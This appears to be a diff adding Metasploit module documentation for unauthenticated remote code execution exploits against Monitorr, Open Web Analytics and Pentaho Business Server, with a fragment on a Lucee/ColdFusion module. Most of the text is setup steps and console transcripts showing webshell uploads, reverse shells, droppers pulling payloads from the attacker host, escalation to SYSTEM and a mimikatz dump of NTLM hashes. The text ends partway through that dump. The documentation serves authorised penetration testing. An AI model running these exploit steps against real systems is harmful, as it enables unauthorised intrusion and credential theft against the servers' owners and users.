+[!] This exploit may require manual cleanup of '/srv/www/app/webroot/GCHSFzGe.cfm' on the target
+[*] Exploit completed, but no session was created.
+```
+## Caveats
+There are a few caveats worth mentioning that are inherent to Lucee's implementation of ColdFusion
+ - When a shell command returns multiple lines of output, coldfusion may limit the amount that is returned; i.e. it
+   will return the full value of an `ls` command, but it may not return the full value of `netstat`
@@ -0,0 +1,231 @@
+## Vulnerable Application
+
+This module exploits an arbitrary file upload vulnerability (CVE-2020-28871) that results into an RCE in Monitorr,
+a web application that allows you to setup a dashboard to monitor various web site/web application up or down state.
+All versions including `v1.7.6m` and latest development release `v1.7.7d` are vulnerable and no patch is available.
+
+The vulnerability occurs due to a lack of appropriate validation when uploading a malicious `GIF` file with
+embedded PHP code to the `assets/data/usrimg` (Linux) or `assets\data\usrimg` (Windows) directory on the web server
+using the vulnerable endpoint `/assets/php/upload.php`. Once uploaded to the server, depending on server configuration,
+the attacker can access the malicious `GIF` file via HTTP or HTTPS, thereby executing the malicious PHP code and
+gaining access to the system.
+
+This vulnerability does not require authentication and any remote attacker can exploit this vulnerability to gain
+access to the underlying operating system as the user under which the web services are running (typically `www-data`).
+
+Installing a vulnerable test bed requires a Linux or Windows machine with the vulnerable Monitorr software loaded.
+Follow instructions [Monitorr Install](https://github.com/Monitorr/Monitorr/wiki/01-Config:--Initial-configuration),
+to install the Monitorr application either on Linux or Windows.
+
+This module has been tested against a Monitorr installation with the specifications listed below:
+
+* Monitorr
+* Version: `1.7.6m`
+* Linux OS: Ubuntu 22.04
+* Windows OS: Windows Data Center 2019
+
+## Verification Steps
+
+1. `use exploit/multi/http/monitorr_webshell_rce_cve_2020_28871`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-PHP, 1-Unix command, 2-Linux Dropper, 3-Windows command, or 4-Windows Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+
+### WEBSHELL
+You can use this option to set the filename and extension of the webshell.
+This is handy if you want to test the webshell upload and execution with different file extensions (.phtml, .php7, .inc)
+to bypass any security settings on the Web and PHP server.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+
+### Monitorr 1.7.6m on Ubuntu Linux 22.04 - PHP Meterpreter session
+```
+msf6 > use exploit/multi/http/monitorr_webshell_rce_cve_2020_28871
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > options
+Module options (exploit/multi/http/monitorr_webshell_rce_cve_2020_28871):
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       SugarCRM base url
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+   WEBSHELL                    no        The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell
+                                         name will be randomly generated if left unset.
+   When TARGET is not 0:
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or
+                                        0.0.0.0 to listen on all addresses.
+   SRVPORT  1981             yes       The local port to listen on.
+Payload options (php/meterpreter/reverse_tcp):
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+Exploit target:
+   Id  Name
+   --  ----
+   0   PHP
+View the full module info with the info, or info -d command.
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set rhosts 192.168.201.34
+rhosts => 192.168.201.34
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set lhost 192.168.201.10
+lhost => 192.168.201.10
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 0
+target => 0
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.34
+[+] Deleted tsrezgkjwmtxyj.php
+[*] Meterpreter session 1 opened (192.168.201.10:4444 -> 192.168.201.34:54680) at 2023-03-13 16:14:32 +0000
+
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
+
+### Monitorr 1.7.6m on Ubuntu Linux 22.04 - bash reverse shell
+```
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 1
+target => 1
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted jzcjawsk.php
+[*] Command shell session 2 opened (192.168.201.10:4444 -> 192.168.201.34:58348) at 2023-03-13 16:16:06 +0000
+
+uname -a
+Linux cuckoo 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+
+### Monitorr 1.7.6m on Ubuntu Linux 22.04 - Linux Dropper Meterpreter session
+```
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 2
+target => 2
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:1981/nAtmJo
+[*] Client 192.168.201.34 (Wget/1.21.2) requested /nAtmJo
+[*] Sending payload to 192.168.201.34 (Wget/1.21.2)
+[*] Sending stage (3045348 bytes) to 192.168.201.34
+[+] Deleted ebdzghdq.php
+[*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.34:32922) at 2023-03-13 16:17:05 +0000
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.34
+OS           : Ubuntu 22.04 (Linux 5.15.0-60-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
+
+### Monitorr 1.7.6m on Windows Data Center 2019 - Powershell Meterpreter session
+```
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set rhosts 192.168.201.36
+rhosts => 192.168.201.36
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > check
+[+] 192.168.201.36:80 - The target is vulnerable. Monitorr version: 1.7.6m
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 3
+target => 3
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing Windows Command for cmd/windows/powershell/meterpreter/reverse_tcp
+[*] Sending stage (175686 bytes) to 192.168.201.36
+[+] Deleted dkvszuqil.php
+[*] Meterpreter session 4 opened (192.168.201.10:4444 -> 192.168.201.36:54805) at 2023-03-13 16:18:53 +0000
+
+meterpreter > sysinfo
+Computer        : WIN-HHRQENPDSRS
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+### Monitorr 1.7.6m on Windows Data Center 2019 - Windows Dropper Meterpreter session
+```
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 4
+target => 4
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing Windows EXE Dropper for windows/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:1981/EEFxVaRHZLJZNrF
+[*] Client 192.168.201.36 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /EEFxVaRHZLJZNrF
+[*] Sending payload to 192.168.201.36 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
+[*] Sending stage (200774 bytes) to 192.168.201.36
+[+] Deleted zyrkwyinvjnzr.php
+[*] Meterpreter session 5 opened (192.168.201.10:4444 -> 192.168.201.36:54882) at 2023-03-13 16:19:52 +0000
+[*] Command Stager progress - 100.00% done (155/155 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer        : WIN-HHRQENPDSRS
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+## Limitations
+No limitations identified.
@@ -0,0 +1,84 @@
+## Vulnerable Application
+
+Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated
+remote attacker to obtain sensitive user information, which can be
+used to gain admin privileges by leveraging cache hashes. This occurs
+because files generated with '<?php (instead of the intended "<?php sequence) aren't
+handled by the PHP interpreter.
+
+## Verification Steps
+
+1. Start a vulnerable instance of OWA using docker
+    - Download https://github.com/Pflegusch/CVE-2022-24637/blob/main/deployment/docker-compose.yml
+    - Start the containers: `docker compose up -d`
+    - Open http://127.0.0.1:80/
+    - Follow installation steps using the envs from the `docker-compose.yml` file
+        - Public URL: `http://127.0.0.1/`
+        - Database Host (`docker inspect <db-container>` and get `IPAddress`, e.g `172.22.0.2`)
+        - Database Port: `3306`
+        - Database Name: `owa`
+        - Database User: `owa`
+        - Database Password: `Demo12+#`
+        - Continue
+        - Site Domain: `http://127.0.0.1`
+        - Admin name: `admin`
+        - E-Mail: `admin@admin.com`
+        - Password: `Demo12+#`
+        - Continue
+
+2. Start `msfconsole`
+3. `use exploit/multi/http/open_web_analytics_rce`
+4. `set RHOSTS 127.0.0.1`
+5. `set RPORT 80`
+6. `set SSL false`
+7. `set LHOST 172.22.0.1` -> this needs to be bridge IP that got created with the `docker compose up -d` command
+8. `check`
+9. `run`
+
+## Options
+### Password
+
+When exploiting the target, the password of the attacked user will be overwritten with this password.
+
+### Username
+
+The user that will be targeted with this exploit.
+
+## Advanced Options
+### SearchLimit
+
+The exploit works by retrieving a `temp_passkey` value from a cache file that gets created for each user when trying to login with it.
+Since the `/owa-data/caches/` directory is publicly accessible, we can retrieve these cache files. The exact path for the cache files
+depends on the `user_id` and can get calculated with that. This option defines how many calculated paths, starting from 0, should be
+checked for cache files with the `temp_passkey` value in it.
+
+## Scenarios
+### Version 1.7.3 using docker deployment from above
+```
+msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
+LHOST => 172.22.0.1
+msf6 exploit(multi/http/open_web_analytics_rce) > run
+
+[*] Started reverse TCP handler on 172.22.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
+[+] Connected to http://127.0.0.1/ successfully!
+[*] Attempting to find cache of 'admin' user
+[+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
+[+] Changed the password of 'admin' to 'pwned'
+[+] Logged in as admin user
+[*] Creating log file
+[+] Wrote payload to file
+[*] Sending stage (39927 bytes) to 172.22.0.3
+[+] Deleted QY0yivK4.php
+[*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
+[+] Triggering payload! Check your listener!
+
+meterpreter > pwd
+/var/www/html/owa-data/caches
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
@@ -0,0 +1,464 @@
+## Vulnerable Application  
+
+Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x is
+vulnerable to an authentication bypass ([CVE-2022-43939](https://attackerkb.com/topics/JGGe0nRNNv/cve-2022-43939?referrer=docs))
+and Server Side Template Injection (SSTI) vulnerability ([CVE-2022-43769](https://attackerkb.com/topics/hy6nWcCo30/cve-2022-43769?referrer=docs))
+that can be chained together to achieve unauthenticated code execution as the user running the Pentaho Business Analytics Server.
+
+The first vulnerability ([CVE-2022-43939](https://attackerkb.com/topics/JGGe0nRNNv/cve-2022-43939?referrer=docs))
+is an authentication bypass which stems from a regex that allows any URL that ends in `/`, followed by `require`, 
+optionally `-js` or `-cfg`, any character, and then the string `js` followed optionally by `?` and then any 
+characters of the attacker's choice.
+
+The second ([CVE-2022-43769](https://attackerkb.com/topics/hy6nWcCo30/cve-2022-43769?referrer=docs)) is a server side 
+template injection. This vulnerability allows RCE by making a GET request to `/api/ldap/config/ldapTreeNodeChildren` and
+setting the `url` parameter to ThymeLeaf template code. By abusing the ability to execute arbitrary Java classes within 
+Thymeleaf templates, an attacker can execute arbitrary commands as the user running the Pentaho Business Analytics Server.
+
+### Setup
+
+A vulnerable application can be downloaded for either Windows Linux or Mac from the Hitachi Vantara
+[downloads](https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html)
+page after clicking the `Start a Free 30-Day Trial` button.
+
+For backup purposes a copy of the Windows installer for 9.3.0.0-428 x64 which can be used for testing
+can be found at https://archive.org/details/pentaho-business-analytics-9.3.0.0-428-x64 in case these pages no longer
+serve a vulnerable copy of the software.
+  
+Once downloaded, extract and run the installer. The installation wizard will ask you to set a password for the Pentaho
+Business server. Once installation completes it will ask if you would like to launch the application. 
+
+## Verification Steps  
+  
+1. Start msfconsole  
+1. Do: `use multi/http/pentaho_business_server_authbypass_and_ssti`  
+1. Set the `RHOST` and `LHOST` options
+1. Ensure the `TARGET` option corresponds to the environment being targeted.  
+1. `exploit`
+1. Receive a session in the context of the user that's running Pentaho Business Server.  
+  
+## Scenarios
+
+### Windows Server 2022 pentaho-business-analytics-9.3.0.0-428-x64.exe with Metasploit Payload
+```
+msf6 > use exploit/multi/http/pentaho_business_server_authbypass_and_ssti 
+[*] Using configured payload cmd/unix/reverse_openssl
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > set RHOST 192.168.204.142
+RHOST => 192.168.204.142
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > set LHOST 192.168.204.128 
+LHOST => 192.168.204.128
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > set TARGET 3
+TARGET => 3
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > show options
+
+Module options (exploit/multi/http/pentaho_business_server_authbypass_and_ssti):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.204.142  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /pentaho         yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (windows/x64/meterpreter_reverse_tcp):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   EXTENSIONS                   no        Comma-separate list of extensions to load
+   EXTINIT                      no        Initialization strings for extensions
+   LHOST       192.168.204.128  yes       The listen address (an interface may be specified)
+   LPORT       4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   3   Windows Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > check
+[*] 192.168.204.142:8080 - The target appears to be vulnerable.
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > exploit
+
+[*] Started reverse TCP handler on 192.168.204.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Attempting to exploit...
+[*] Command Stager progress -   0.73% done (2046/279726 bytes)
+[*] Command Stager progress -   1.46% done (4092/279726 bytes)
+[*] Command Stager progress -   2.19% done (6138/279726 bytes)
+[*] Command Stager progress -   2.93% done (8184/279726 bytes)
+[*] Command Stager progress -   3.66% done (10230/279726 bytes)
+[*] Command Stager progress -   4.39% done (12276/279726 bytes)
+[*] Command Stager progress -   5.12% done (14322/279726 bytes)
+[*] Command Stager progress -   5.85% done (16368/279726 bytes)
+[*] Command Stager progress -   6.58% done (18414/279726 bytes)
+[*] Command Stager progress -   7.31% done (20460/279726 bytes)
+[*] Command Stager progress -   8.05% done (22506/279726 bytes)
+[*] Command Stager progress -   8.78% done (24552/279726 bytes)
+[*] Command Stager progress -   9.51% done (26598/279726 bytes)
+[*] Command Stager progress -  10.24% done (28644/279726 bytes)
+[*] Command Stager progress -  10.97% done (30690/279726 bytes)
+[*] Command Stager progress -  11.70% done (32736/279726 bytes)
+[*] Command Stager progress -  12.43% done (34782/279726 bytes)
+[*] Command Stager progress -  13.17% done (36828/279726 bytes)
+[*] Command Stager progress -  13.90% done (38874/279726 bytes)
+[*] Command Stager progress -  14.63% done (40920/279726 bytes)
+[*] Command Stager progress -  15.36% done (42966/279726 bytes)
+[*] Command Stager progress -  16.09% done (45012/279726 bytes)
+[*] Command Stager progress -  16.82% done (47058/279726 bytes)
+[*] Command Stager progress -  17.55% done (49104/279726 bytes)
+[*] Command Stager progress -  18.29% done (51150/279726 bytes)
+[*] Command Stager progress -  19.02% done (53196/279726 bytes)
+[*] Command Stager progress -  19.75% done (55242/279726 bytes)
+[*] Command Stager progress -  20.48% done (57288/279726 bytes)
+[*] Command Stager progress -  21.21% done (59334/279726 bytes)
+[*] Command Stager progress -  21.94% done (61380/279726 bytes)
+[*] Command Stager progress -  22.67% done (63426/279726 bytes)
+[*] Command Stager progress -  23.41% done (65472/279726 bytes)
+[*] Command Stager progress -  24.14% done (67518/279726 bytes)
+[*] Command Stager progress -  24.87% done (69564/279726 bytes)
+[*] Command Stager progress -  25.60% done (71610/279726 bytes)
+[*] Command Stager progress -  26.33% done (73656/279726 bytes)
+[*] Command Stager progress -  27.06% done (75702/279726 bytes)
+[*] Command Stager progress -  27.79% done (77748/279726 bytes)
+[*] Command Stager progress -  28.53% done (79794/279726 bytes)
+[*] Command Stager progress -  29.26% done (81840/279726 bytes)
+[*] Command Stager progress -  29.99% done (83886/279726 bytes)
+[*] Command Stager progress -  30.72% done (85932/279726 bytes)
+[*] Command Stager progress -  31.45% done (87978/279726 bytes)
+[*] Command Stager progress -  32.18% done (90024/279726 bytes)
+[*] Command Stager progress -  32.91% done (92070/279726 bytes)
+[*] Command Stager progress -  33.65% done (94116/279726 bytes)
+[*] Command Stager progress -  34.38% done (96162/279726 bytes)
+[*] Command Stager progress -  35.11% done (98208/279726 bytes)
+[*] Command Stager progress -  35.84% done (100254/279726 bytes)
+[*] Command Stager progress -  36.57% done (102300/279726 bytes)
+[*] Command Stager progress -  37.30% done (104346/279726 bytes)
+[*] Command Stager progress -  38.03% done (106392/279726 bytes)
+[*] Command Stager progress -  38.77% done (108438/279726 bytes)
+[*] Command Stager progress -  39.50% done (110484/279726 bytes)
+[*] Command Stager progress -  40.23% done (112530/279726 bytes)
+[*] Command Stager progress -  40.96% done (114576/279726 bytes)
+[*] Command Stager progress -  41.69% done (116622/279726 bytes)
+[*] Command Stager progress -  42.42% done (118668/279726 bytes)
+[*] Command Stager progress -  43.15% done (120714/279726 bytes)
+[*] Command Stager progress -  43.89% done (122760/279726 bytes)
+[*] Command Stager progress -  44.62% done (124806/279726 bytes)
+[*] Command Stager progress -  45.35% done (126852/279726 bytes)
+[*] Command Stager progress -  46.08% done (128898/279726 bytes)
+[*] Command Stager progress -  46.81% done (130944/279726 bytes)
+[*] Command Stager progress -  47.54% done (132990/279726 bytes)
+[*] Command Stager progress -  48.27% done (135036/279726 bytes)
+[*] Command Stager progress -  49.01% done (137082/279726 bytes)
+[*] Command Stager progress -  49.74% done (139128/279726 bytes)
+[*] Command Stager progress -  50.47% done (141174/279726 bytes)
+[*] Command Stager progress -  51.20% done (143220/279726 bytes)
+[*] Command Stager progress -  51.93% done (145266/279726 bytes)
+[*] Command Stager progress -  52.66% done (147312/279726 bytes)
+[*] Command Stager progress -  53.39% done (149358/279726 bytes)
+[*] Command Stager progress -  54.13% done (151404/279726 bytes)
+[*] Command Stager progress -  54.86% done (153450/279726 bytes)
+[*] Command Stager progress -  55.59% done (155496/279726 bytes)
+[*] Command Stager progress -  56.32% done (157542/279726 bytes)
+[*] Command Stager progress -  57.05% done (159588/279726 bytes)
+[*] Command Stager progress -  57.78% done (161634/279726 bytes)
+[*] Command Stager progress -  58.51% done (163680/279726 bytes)
+[*] Command Stager progress -  59.25% done (165726/279726 bytes)
+[*] Command Stager progress -  59.98% done (167772/279726 bytes)
+[*] Command Stager progress -  60.71% done (169818/279726 bytes)
+[*] Command Stager progress -  61.44% done (171864/279726 bytes)
+[*] Command Stager progress -  62.17% done (173910/279726 bytes)
+[*] Command Stager progress -  62.90% done (175956/279726 bytes)
+[*] Command Stager progress -  63.63% done (178002/279726 bytes)
+[*] Command Stager progress -  64.37% done (180048/279726 bytes)
+[*] Command Stager progress -  65.10% done (182094/279726 bytes)
+[*] Command Stager progress -  65.83% done (184140/279726 bytes)
+[*] Command Stager progress -  66.56% done (186186/279726 bytes)
+[*] Command Stager progress -  67.29% done (188232/279726 bytes)
+[*] Command Stager progress -  68.02% done (190278/279726 bytes)
+[*] Command Stager progress -  68.75% done (192324/279726 bytes)
+[*] Command Stager progress -  69.49% done (194370/279726 bytes)
+[*] Command Stager progress -  70.22% done (196416/279726 bytes)
+[*] Command Stager progress -  70.95% done (198462/279726 bytes)
+[*] Command Stager progress -  71.68% done (200508/279726 bytes)
+[*] Command Stager progress -  72.41% done (202554/279726 bytes)
+[*] Command Stager progress -  73.14% done (204600/279726 bytes)
+[*] Command Stager progress -  73.87% done (206646/279726 bytes)
+[*] Command Stager progress -  74.61% done (208692/279726 bytes)
+[*] Command Stager progress -  75.34% done (210738/279726 bytes)
+[*] Command Stager progress -  76.07% done (212784/279726 bytes)
+[*] Command Stager progress -  76.80% done (214830/279726 bytes)
+[*] Command Stager progress -  77.53% done (216876/279726 bytes)
+[*] Command Stager progress -  78.26% done (218922/279726 bytes)
+[*] Command Stager progress -  78.99% done (220968/279726 bytes)
+[*] Command Stager progress -  79.73% done (223014/279726 bytes)
+[*] Command Stager progress -  80.46% done (225060/279726 bytes)
+[*] Command Stager progress -  81.19% done (227106/279726 bytes)
+[*] Command Stager progress -  81.92% done (229152/279726 bytes)
+[*] Command Stager progress -  82.65% done (231198/279726 bytes)
+[*] Command Stager progress -  83.38% done (233244/279726 bytes)
+[*] Command Stager progress -  84.11% done (235290/279726 bytes)
+[*] Command Stager progress -  84.85% done (237336/279726 bytes)
+[*] Command Stager progress -  85.58% done (239382/279726 bytes)
+[*] Command Stager progress -  86.31% done (241428/279726 bytes)
+[*] Command Stager progress -  87.04% done (243474/279726 bytes)
+[*] Command Stager progress -  87.77% done (245520/279726 bytes)
+[*] Command Stager progress -  88.50% done (247566/279726 bytes)
+[*] Command Stager progress -  89.23% done (249612/279726 bytes)
+[*] Command Stager progress -  89.97% done (251658/279726 bytes)
+[*] Command Stager progress -  90.70% done (253704/279726 bytes)
+[*] Command Stager progress -  91.43% done (255750/279726 bytes)
+[*] Command Stager progress -  92.16% done (257796/279726 bytes)
+[*] Command Stager progress -  92.89% done (259842/279726 bytes)
+[*] Command Stager progress -  93.62% done (261888/279726 bytes)
+[*] Command Stager progress -  94.35% done (263934/279726 bytes)
+[*] Command Stager progress -  95.09% done (265980/279726 bytes)
+[*] Command Stager progress -  95.82% done (268026/279726 bytes)
+[*] Command Stager progress -  96.55% done (270072/279726 bytes)
+[*] Command Stager progress -  97.28% done (272118/279726 bytes)
+[*] Command Stager progress -  98.01% done (274164/279726 bytes)
+[*] Command Stager progress -  98.74% done (276210/279726 bytes)
+[*] Command Stager progress -  99.47% done (278256/279726 bytes)
+[*] Command Stager progress - 100.00% done (279726/279726 bytes)
+[*] Meterpreter session 1 opened (192.168.204.128:4444 -> 192.168.204.142:56951) at 2023-05-10 10:34:39 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\LOCAL SERVICE
+meterpreter > sysinfo
+Computer        : WIN-BRSHGJGIDFM
+OS              : Windows 2016+ (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : DAFOREST
+Logged On Users : 8
+Meterpreter     : x64/windows
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeAssignPrimaryTokenPrivilege
+SeAuditPrivilege
+SeChangeNotifyPrivilege
+SeCreateGlobalPrivilege
+SeImpersonatePrivilege
+SeIncreaseQuotaPrivilege
+SeIncreaseWorkingSetPrivilege
+SeMachineAccountPrivilege
+SeSystemtimePrivilege
+SeTimeZonePrivilege
+
+meterpreter > getsystem
+...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
+meterpreter > load kiwi
+Loading extension kiwi...
+  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
+ .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
+ ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
+ ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
+ '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
+  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
+
+Success.
+meterpreter > creds_all
+[+] Running as SYSTEM
+[*] Retrieving all credentials
+msv credentials
+===============
+
+Username          Domain    NTLM                              SHA1                                      DPAPI
+--------          ------    ----                              ----                                      -----
+Administrator     DAFOREST  39e6a864caf708828ad5f365c6557ec5  217d426585b0342c0ba8901ca377e931244258d6  1c8389ab3dd1f3222399daea0d1f62a3
+WIN-BRSHGJGIDFM$  DAFOREST  35007500716a88e85377f2a4619adb97  787d11814c33d69f68caf99ea018a0f9a23b2326
+
+ssp credentials
+===============
+
+Username  Domain        Password
+--------  ------        --------
+(null)    daforest.com  (null)
+
+wdigest credentials
+===================
+
+Username          Domain    Password
+--------          ------    --------
+(null)            (null)    (null)
+Administrator     DAFOREST  (null)
+WIN-BRSHGJGIDFM$  DAFOREST  (null)
+
+kerberos credentials
+====================
+
+Username          Domain        Password
+--------          ------        --------
+(null)            (null)        (null)
+Administrator     DAFOREST.COM  (null)
+WIN-BRSHGJGIDFM$  daforest.com  79 cc b9 21 3f af 84 c2 6e 71 11 8b ec 7e b2 3d 3f 03 3d 37 c2 76 a9 4d 46 4c 13 4f 6a c8 fd c9 24 57 e3 08 51 c3 89 1f 75 4f 05 d2 ea 12 45 b1 96 7d bd 23 f5 0
+                                0 9e ff 03 c8 36 1b 9d 99 64 d1 78 50 73 24 28 12 a3 a5 d1 46 da d8 d3 a5 6c 13 bf 4a f7 0b 00 0d a6 7f 92 46 8e d2 69 69 87 35 5b c8 28 02 c2 32 5e 09 74 7d 5a
+                                 e9 ba b1 51 69 19 21 78 4b 54 68 b9 2d f8 6f 40 fd ed 17 78 86 75 51 59 bb 1e c1 5d 64 17 82 ce 95 25 29 95 fb 6b 8e cc 8f 76 54 63 ea 46 7b 06 04 fc 4a 1c 65
